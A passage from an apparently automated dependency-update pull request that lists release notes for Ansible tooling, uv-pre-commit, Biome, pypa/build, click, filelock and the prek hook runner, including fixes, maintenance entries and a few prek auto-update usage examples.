[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: force use of newer node
([#&#8203;121](https://redirect.github.com/ansible/actions/issues/121))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update all dependencies pep621
([#&#8203;120](https://redirect.github.com/ansible/actions/issues/120))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;119](https://redirect.github.com/ansible/actions/issues/119))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v1.1.1`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.1)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1.1.0...v1.1.1)

#### Fixes

- fix: address issue with shellcheck calling
([#&#8203;118](https://redirect.github.com/ansible/actions/issues/118))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update all dependencies pep621
([#&#8203;117](https://redirect.github.com/ansible/actions/issues/117))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;116](https://redirect.github.com/ansible/actions/issues/116))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update dependencies
([#&#8203;115](https://redirect.github.com/ansible/actions/issues/115))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies pep621
([#&#8203;114](https://redirect.github.com/ansible/actions/issues/114))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;113](https://redirect.github.com/ansible/actions/issues/113))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v1.1.0`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.0)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1.0.1...v1.1.0)

#### Features

- feat: add pyright hook definition
([#&#8203;111](https://redirect.github.com/ansible/actions/issues/111))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Fixes

- fix: display gitleaks version before calling it
([#&#8203;108](https://redirect.github.com/ansible/actions/issues/108))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: allow renovate to create up to 3 PRs
([#&#8203;107](https://redirect.github.com/ansible/actions/issues/107))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update actions/download-artifact action
([#&#8203;109](https://redirect.github.com/ansible/actions/issues/109))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies pep621
([#&#8203;110](https://redirect.github.com/ansible/actions/issues/110))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;106](https://redirect.github.com/ansible/actions/issues/106))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v1.0.1`](https://redirect.github.com/ansible/actions/releases/tag/v1.0.1)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1...v1.0.1)

#### Fixes

- fix: configure renovate to bump minimal versions on security alerts
([#&#8203;104](https://redirect.github.com/ansible/actions/issues/104))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: make codecov curl validation retry
([#&#8203;103](https://redirect.github.com/ansible/actions/issues/103))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: run codespell as a tool
([#&#8203;102](https://redirect.github.com/ansible/actions/issues/102))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update all dependencies to
[`bbbca2d`](https://redirect.github.com/ansible/actions/commit/bbbca2d)
([#&#8203;100](https://redirect.github.com/ansible/actions/issues/100))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v1.0.0`](https://redirect.github.com/ansible/actions/releases/tag/v1.0.0)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1...v1)

#### Features

- feat: add pydoclint hook definition
([#&#8203;99](https://redirect.github.com/ansible/actions/issues/99))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Fixes

- fix: fix shellcheck hook in local testing
([#&#8203;98](https://redirect.github.com/ansible/actions/issues/98))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: use sh when calling system hooks
([#&#8203;97](https://redirect.github.com/ansible/actions/issues/97))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: cancel current workflow when autofix is applied
([#&#8203;95](https://redirect.github.com/ansible/actions/issues/95))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: prevent prek node install from touching package-lock.json file
([#&#8203;94](https://redirect.github.com/ansible/actions/issues/94))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update all dependencies
([#&#8203;93](https://redirect.github.com/ansible/actions/issues/93))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v1`](https://redirect.github.com/ansible/actions/compare/v0.5.1...v1)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v0.5.1...v1)

</details>

<details>
<summary>ansible/ansible-lint (ansible/ansible-lint)</summary>

###
[`v26.4.0`](https://redirect.github.com/ansible/ansible-lint/releases/tag/v26.4.0)

[Compare
Source](https://redirect.github.com/ansible/ansible-lint/compare/v26.3.0...v26.4.0)

#### Fixes

- fix: remove deprecated apt\_key module from examples and builtins
([#&#8203;5000](https://redirect.github.com/ansible/ansible-lint/issues/5000))
[@&#8203;cidrblock](https://redirect.github.com/cidrblock)
- fix(security): update dependencies \[SECURITY]
([#&#8203;5010](https://redirect.github.com/ansible/ansible-lint/issues/5010))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- fix: avoid permission error when linting /tmp files
([#&#8203;5009](https://redirect.github.com/ansible/ansible-lint/issues/5009))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: reapply false positive patch for no-changed-when rule
([#&#8203;4989](https://redirect.github.com/ansible/ansible-lint/issues/4989))
[@&#8203;Red-GV](https://redirect.github.com/Red-GV)
- docs: fix inaccuracies found during documentation audit
([#&#8203;4999](https://redirect.github.com/ansible/ansible-lint/issues/4999))
[@&#8203;cidrblock](https://redirect.github.com/cidrblock)
- fix: support collection format in mock\_roles
([#&#8203;4980](https://redirect.github.com/ansible/ansible-lint/issues/4980))
[@&#8203;emmanuel-ferdman](https://redirect.github.com/emmanuel-ferdman)
- fix(security): update dependencies \[SECURITY]
([#&#8203;4993](https://redirect.github.com/ansible/ansible-lint/issues/4993))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

#### Maintenance

- chore: update hooks
([#&#8203;5008](https://redirect.github.com/ansible/ansible-lint/issues/5008))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- chore: implement workaround for coverage merging failure
([#&#8203;5006](https://redirect.github.com/ansible/ansible-lint/issues/5006))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- Add support for upcoming Ubuntu 26.04
([#&#8203;4995](https://redirect.github.com/ansible/ansible-lint/issues/4995))
[@&#8203;Andiroid](https://redirect.github.com/Andiroid)
- chore(deps): update all dependencies pep621
([#&#8203;4994](https://redirect.github.com/ansible/ansible-lint/issues/4994))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): bump black from 26.1.0 to 26.3.1 in /.config
([#&#8203;4991](https://redirect.github.com/ansible/ansible-lint/issues/4991))
@&#8203;[dependabot\[bot\]](https://redirect.github.com/apps/dependabot)

###
[`v26.3.0`](https://redirect.github.com/ansible/ansible-lint/releases/tag/v26.3.0)

[Compare
Source](https://redirect.github.com/ansible/ansible-lint/compare/v26.2.0...v26.3.0)

##### Features

- feat: add jinja2-template-extension opt-in rule
([#&#8203;4979](https://redirect.github.com/ansible/ansible-lint/issues/4979))
[@&#8203;djdanielsson](https://redirect.github.com/djdanielsson)

##### Fixes

- fix: Add missing version\_changed var to ComplexityRule class
([#&#8203;4987](https://redirect.github.com/ansible/ansible-lint/issues/4987))
[@&#8203;thrashwerk](https://redirect.github.com/thrashwerk)

##### Maintenance

- chore: pre-commit autoupdate
([#&#8203;4986](https://redirect.github.com/ansible/ansible-lint/issues/4986))
@&#8203;[pre-commit-ci\[bot\]](https://redirect.github.com/apps/pre-commit-ci)
- chore(deps): update all dependencies pep621
([#&#8203;4984](https://redirect.github.com/ansible/ansible-lint/issues/4984))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;4983](https://redirect.github.com/ansible/ansible-lint/issues/4983))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps-dev): bump minimatch from 9.0.5 to 10.2.4 in /test/schemas
([#&#8203;4982](https://redirect.github.com/ansible/ansible-lint/issues/4982))
@&#8203;[dependabot\[bot\]](https://redirect.github.com/apps/dependabot)

</details>

<details>
<summary>ansible/team-devtools (ansible/team-devtools)</summary>

###
[`v26.4.0`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.4.0)

[Compare
Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.2...v26.4.0)

#### Fixes

- fix: stop if unsigned commits are detected
([#&#8203;438](https://redirect.github.com/ansible/team-devtools/issues/438))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update pep621
([#&#8203;432](https://redirect.github.com/ansible/team-devtools/issues/432))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v26.2.2`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.2.2)

[Compare
Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.1...v26.2.2)

#### Maintenance

- chore: dump event info for test pipeline
([#&#8203;427](https://redirect.github.com/ansible/team-devtools/issues/427))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- chore(deps): update all dependencies
([#&#8203;426](https://redirect.github.com/ansible/team-devtools/issues/426))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v26.2.1`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.2.1)

[Compare
Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.0...v26.2.1)

#### Fixes

- fix: make slack notification use markdown
([#&#8203;424](https://redirect.github.com/ansible/team-devtools/issues/424))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: make slack alert easier to read
([#&#8203;423](https://redirect.github.com/ansible/team-devtools/issues/423))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

</details>

<details>
<summary>astral-sh/uv-pre-commit (astral-sh/uv-pre-commit)</summary>

###
[`v0.11.8`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.8)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.7...0.11.8)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.8>

###
[`v0.11.7`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.7)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.6...0.11.7)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.7>

###
[`v0.11.6`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.6)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.5...0.11.6)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.6>

###
[`v0.11.5`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.5)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.4...0.11.5)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.5>

###
[`v0.11.4`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.4)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.3...0.11.4)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.4>

###
[`v0.11.3`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.3)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.2...0.11.3)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.3>

###
[`v0.11.2`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.2)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.1...0.11.2)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.2>

###
[`v0.11.1`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.1)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.0...0.11.1)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.1>

###
[`v0.11.0`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.0)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.12...0.11.0)

See: <https://github.com/astral-sh/uv/releases/tag/0.11.0>

###
[`v0.10.12`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.12)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.11...0.10.12)

See: <https://github.com/astral-sh/uv/releases/tag/0.10.12>

###
[`v0.10.11`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.11)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.10...0.10.11)

See: <https://github.com/astral-sh/uv/releases/tag/0.10.11>

###
[`v0.10.10`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.10)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.9...0.10.10)

See: <https://github.com/astral-sh/uv/releases/tag/0.10.10>

###
[`v0.10.9`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.9)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.8...0.10.9)

See: <https://github.com/astral-sh/uv/releases/tag/0.10.9>

###
[`v0.10.8`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.8)

[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.7...0.10.8)

See: <https://github.com/astral-sh/uv/releases/tag/0.10.8>

</details>

<details>
<summary>biomejs/pre-commit (biomejs/pre-commit)</summary>

###
[`v2.4.14`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.13...v2.4.14)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.13...v2.4.14)

###
[`v2.4.13`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.12...v2.4.13)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.12...v2.4.13)

###
[`v2.4.12`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.11...v2.4.12)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.11...v2.4.12)

###
[`v2.4.11`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.10...v2.4.11)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.10...v2.4.11)

###
[`v2.4.10`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.9...v2.4.10)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.9...v2.4.10)

###
[`v2.4.9`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.8...v2.4.9)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.8...v2.4.9)

###
[`v2.4.8`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.7...v2.4.8)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.7...v2.4.8)

###
[`v2.4.7`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.6...v2.4.7)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.6...v2.4.7)

###
[`v2.4.6`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.5...v2.4.6)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.5...v2.4.6)

###
[`v2.4.5`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.4...v2.4.5)

[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.4...v2.4.5)

</details>

<details>
<summary>pypa/build (build)</summary>

###
[`v1.5.0`](https://redirect.github.com/pypa/build/releases/tag/1.5.0)

[Compare
Source](https://redirect.github.com/pypa/build/compare/1.4.4...1.5.0)

<!-- Release notes generated using configuration in .github/release.yml
at 1.5.0 -->

#### What's Changed

- ci: try to improve release docs by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1051](https://redirect.github.com/pypa/build/pull/1051)
- feat: drop 3.9, require 3.10+ by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1036](https://redirect.github.com/pypa/build/pull/1036)
- chore: tox toml by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1033](https://redirect.github.com/pypa/build/pull/1033)
- fix: api should not ignore installed, only CLI by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1056](https://redirect.github.com/pypa/build/pull/1056)

**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.4...1.5.0>

###
[`v1.4.4`](https://redirect.github.com/pypa/build/releases/tag/1.4.4)

[Compare
Source](https://redirect.github.com/pypa/build/compare/1.4.3...1.4.4)

<!-- Release notes generated using configuration in .github/release.yml
at 1.4.4 -->

#### What's Changed

- 🐛 fix(release): generate consistent CHANGELOG heading levels by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1032](https://redirect.github.com/pypa/build/pull/1032)
- docs: move source links by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1034](https://redirect.github.com/pypa/build/pull/1034)
- revert: drop PEP 660 change by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1039](https://redirect.github.com/pypa/build/pull/1039)
- fix: ignore installed when running pip by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1040](https://redirect.github.com/pypa/build/pull/1040)
- fix: revert part of
[#&#8203;973](https://redirect.github.com/pypa/build/issues/973) by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1044](https://redirect.github.com/pypa/build/pull/1044)
- chore: report coverage failure lines by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1046](https://redirect.github.com/pypa/build/pull/1046)
- tests: fix issue with uv run by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1048](https://redirect.github.com/pypa/build/pull/1048)
- docs: reorganize testing docs for copy/paste by
[@&#8203;abitrolly](https://redirect.github.com/abitrolly) in
[#&#8203;1043](https://redirect.github.com/pypa/build/pull/1043)
- tests: keep environment from leaking in Python 3.15 by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1049](https://redirect.github.com/pypa/build/pull/1049)
- docs: fix issue with changelog generation by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1050](https://redirect.github.com/pypa/build/pull/1050)

**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.3...1.4.4>

###
[`v1.4.3`](https://redirect.github.com/pypa/build/releases/tag/1.4.3)

[Compare
Source](https://redirect.github.com/pypa/build/compare/1.4.2...1.4.3)

<!-- Release notes generated using configuration in .github/release.yml
at 1.4.3 -->

##### What's Changed

- 🐛 fix(api): resolve thread-safety races in build API by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1015](https://redirect.github.com/pypa/build/pull/1015)
- 🐛 fix(builder): validate backend-path entries exist on disk by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1016](https://redirect.github.com/pypa/build/pull/1016)
- test: cover config settings build paths by
[@&#8203;terminalchai](https://redirect.github.com/terminalchai) in
[#&#8203;992](https://redirect.github.com/pypa/build/pull/992)
- Add kind=(step, ) for root messages with \* by
[@&#8203;abitrolly](https://redirect.github.com/abitrolly) in
[#&#8203;973](https://redirect.github.com/pypa/build/pull/973)
- fix: correct changelog category ordering by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1017](https://redirect.github.com/pypa/build/pull/1017)
- 🐛 fix(cli): show full dependency chain in missing deps error by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1019](https://redirect.github.com/pypa/build/pull/1019)
- tests: fully annotate by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1020](https://redirect.github.com/pypa/build/pull/1020)
- chore: lazy imports by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1021](https://redirect.github.com/pypa/build/pull/1021)
- chore: adding more ruff codes by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1022](https://redirect.github.com/pypa/build/pull/1022)
- tests: improve annotations by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1023](https://redirect.github.com/pypa/build/pull/1023)
- 🧪 test(coverage): achieve 100% test coverage by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1018](https://redirect.github.com/pypa/build/pull/1018)
- chore: add ruff PT by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1025](https://redirect.github.com/pypa/build/pull/1025)
- chore: add ruff PYI by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1026](https://redirect.github.com/pypa/build/pull/1026)
- chore: add ruff SIM/RET by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1028](https://redirect.github.com/pypa/build/pull/1028)
- 🐛 fix(env): strip PYTHONPATH from isolated builds by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1024](https://redirect.github.com/pypa/build/pull/1024)
- chore: use ruff ALL by
[@&#8203;henryiii](https://redirect.github.com/henryiii) in
[#&#8203;1029](https://redirect.github.com/pypa/build/pull/1029)
- 🐛 fix(env): prevent pip credential hang with private indexes by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1030](https://redirect.github.com/pypa/build/pull/1030)
- 🐛 fix(check\_dependency): verify URL reqs via PEP 610 by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[#&#8203;1027](https://redirect.github.com/pypa/build/pull/1027)

##### New Contributors

- [@&#8203;terminalchai](https://redirect.github.com/terminalchai) made
their first contribution in
[#&#8203;992](https://redirect.github.com/pypa/build/pull/992)

**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.2...1.4.3>

</details>

<details>
<summary>pallets/click (click)</summary>

###
[`v8.3.3`](https://redirect.github.com/pallets/click/compare/8.3.2...8.3.3)

[Compare
Source](https://redirect.github.com/pallets/click/compare/8.3.2...8.3.3)

</details>

<details>
<summary>tox-dev/py-filelock (filelock)</summary>

###
[`v3.29.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.29.0)

[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.28.0...3.29.0)

<!-- Release notes generated using configuration in .github/release.yaml
at 3.29.0 -->

#### What's Changed

- 🐛 fix(async): use single-thread executor for lock consistency by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#533](https://redirect.github.com/tox-dev/filelock/pull/533)
- ✨ feat(soft): enable stale lock detection on Windows by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#534](https://redirect.github.com/tox-dev/filelock/pull/534)

**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.28.0...3.29.0>

###
[`v3.28.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.28.0)

[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.25.2...3.28.0)

<!-- Release notes generated using configuration in .github/release.yaml
at 3.28.0 -->

##### What's Changed

- 🐛 fix(ci): unbreak release workflow, publish to PyPI again by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#529](https://redirect.github.com/tox-dev/filelock/pull/529)

**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.27.0...3.28.0>

</details>

<details>
<summary>j178/prek (prek)</summary>

###
[`v0.3.11`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#0311)

Released on 2026-04-27.

##### Highlights

Hook entries now have an explicit `shell` option for shell snippets. Set
`shell: sh`, `bash`, `pwsh`, `powershell`, or `cmd` when an entry should
be
evaluated by that shell; leaving it unset keeps prek's direct argv
execution.

`prek auto-update` can now filter tag candidates before choosing an
update.
Both options take glob patterns: use `--include-tag` to only consider
matching
tag names, and `--exclude-tag` to skip matching tags such as moving tags
or
prereleases.

##### Enhancements

- Add `auto-update --exclude-repo <repo>` to skip repos
([#&#8203;1983](https://redirect.github.com/j178/prek/pull/1983))
- Add `auto-update --exit-code` to exit with non-zero on updates
([#&#8203;2002](https://redirect.github.com/j178/prek/pull/2002))
- Add `auto-update --include-tag <pattern>`/`--exclude-tag <pattern>` to
filter tags
([#&#8203;1984](https://redirect.github.com/j178/prek/pull/1984))
- Adds an explicit `shell` hook option for entries that should run as
shell source
([#&#8203;2004](https://redirect.github.com/j178/prek/pull/2004))
- Make `--hook-dir` optional for hook-impl
([#&#8203;1989](https://redirect.github.com/j178/prek/pull/1989))
- Skip shim warning when `--script-version` is missing
([#&#8203;1990](https://redirect.github.com/j178/prek/pull/1990))

##### Bug fixes

- Install Ruby executable in gem bin
([#&#8203;2017](https://redirect.github.com/j178/prek/pull/2017))
- Use dedicated Android npm package
([#&#8203;1982](https://redirect.github.com/j178/prek/pull/1982))
- Use stable repo keys without breaking cached clones
([#&#8203;1995](https://redirect.github.com/j178/prek/pull/1995))

##### Documentation

- Explain prek name
([#&#8203;1980](https://redirect.github.com/j178/prek/pull/1980))
- Clarify `pass_filenames` concurrency docs
([#&#8203;1999](https://redirect.github.com/j178/prek/pull/1999))
- Reorganize documentation references
([#&#8203;2005](https://redirect.github.com/j178/prek/pull/2005))
- Clarify hook author manifest env docs
([#&#8203;1991](https://redirect.github.com/j178/prek/pull/1991))
- docs: add Sentry to users list
([#&#8203;1981](https://redirect.github.com/j178/prek/pull/1981))

##### Contributors

- [@&#8203;j178](https://redirect.github.com/j178)

###
[`v0.3.10`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#0310)

Released on 2026-04-21.

##### Enhancements

- Disallow rev for non-remote repos in schema
([#&#8203;1964](https://redirect.github.com/j178/prek/pull/1964))
- Hide up-to-date output in non-verbose mode
([#&#8203;1942](https://redirect.github.com/j178/prek/pull/1942))
- Improve merge conflict marker detection
([#&#8203;1937](https://redirect.github.com/j178/prek/pull/1937))
- Keep finished hooks visible
([#&#8203;1967](https://redirect.github.com/j178/prek/pull/1967))
- Preserve frozen comment spacing in auto-update
([#&#8203;1945](https://redirect.github.com/j178/prek/pull/1945))
- Reimplement `@j178/prek` npm package
([#&#8203;1973](https://redirect.github.com/j178/prek/pull/1973))

##### Bug fixes

- Prefer stable Rust toolchains
([#&#8203;1974](https://redirect.github.com/j178/prek/pull/1974))

##### Documentation

- Add `SKILL.md` for prek
([#&#8203;1950](https://redirect.github.com/j178/prek/pull/1950))
- Document `gh skill install j178/prek prek` to install prek skill for
agents ([#&#8203;1951](https://redirect.github.com/j178/prek/pull/1951))
- Improve compatibility and migration docs
([#&#8203;1940](https://redirect.github.com/j178/prek/pull/1940))

##### Other changes

- Sync latest identify tags
([#&#8203;1947](https://redirect.github.com/j178/prek/pull/1947))

##### Contributors

- [@&#8203;github-actions](https://redirect.github.com/github-actions)
- [@&#8203;renovate](https://redirect.github.com/renovate)
- [@&#8203;j178](https://redirect.github.com/j178)

###
[`v0.3.9`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#039)

Released on 2026-04-13.

##### Highlight

`prek auto-update` is now stricter about pinned revisions and more
useful in CI.
It now keeps `rev` and `# frozen:` comments in sync, can detect
[impostor commits](https://docs.zizmor.sh/audits/#impostor-commit) when
validating pinned SHAs,
and lets you use `prek auto-update --check` to fail on both available
updates and frozen-ref
mismatches without rewriting the config.

Examples:

```console
$ prek auto-update

# updates revs and repairs stale `# frozen:` comments

$ prek auto-update --freeze

# writes frozen SHAs with matching `# frozen: <tag>` comments

$ prek auto-update --check

# exits non-zero when updates are available, a `# frozen:` comment is stale,
# or a pinned SHA does not belong to the fetched upstream refs
```

##### Enhancements

- Check and sync frozen comments during auto-update
([#&#8203;1896](https://redirect.github.com/j178/prek/pull/1896))
- Handle impostor commits in auto-update
([#&#8203;1919](https://redirect.github.com/j178/prek/pull/1919))
- Add experimental `language: dotnet` support
([#&#8203;1871](https://redirect.github.com/j178/prek/pull/1871))
- Honor repo and worktree `core.hooksPath`
([#&#8203;1892](https://redirect.github.com/j178/prek/pull/1892))
- Add `prek run --no-fail-fast` to override config file
([#&#8203;1859](https://redirect.github.com/j178/prek/pull/1859))
- Add `forbid-new-submodules` as builtin hook
([#&#8203;1853](https://redirect.github.com/j178/prek/pull/1853))
- Clean stale patch files in `cache gc`
([#&#8203;1877](https://redirect.github.com/j178/prek/pull/1877))
- Display auto-update results by config entry
([#&#8203;1922](https://redirect.github.com/j178/prek/pull/1922))
- Restrict patch directory permissions
([#&#8203;1876](https://redirect.github.com/j178/prek/pull/1876))
- Show tag names in `auto-update --freeze` output
([#&#8203;1916](https://redirect.github.com/j178/prek/pull/1916))
- Use a bitset for hook stages
([#&#8203;1860](https://redirect.github.com/j178/prek/pull/1860))

##### Bug fixes

- Canonicalize CWD and GIT\_ROOT paths
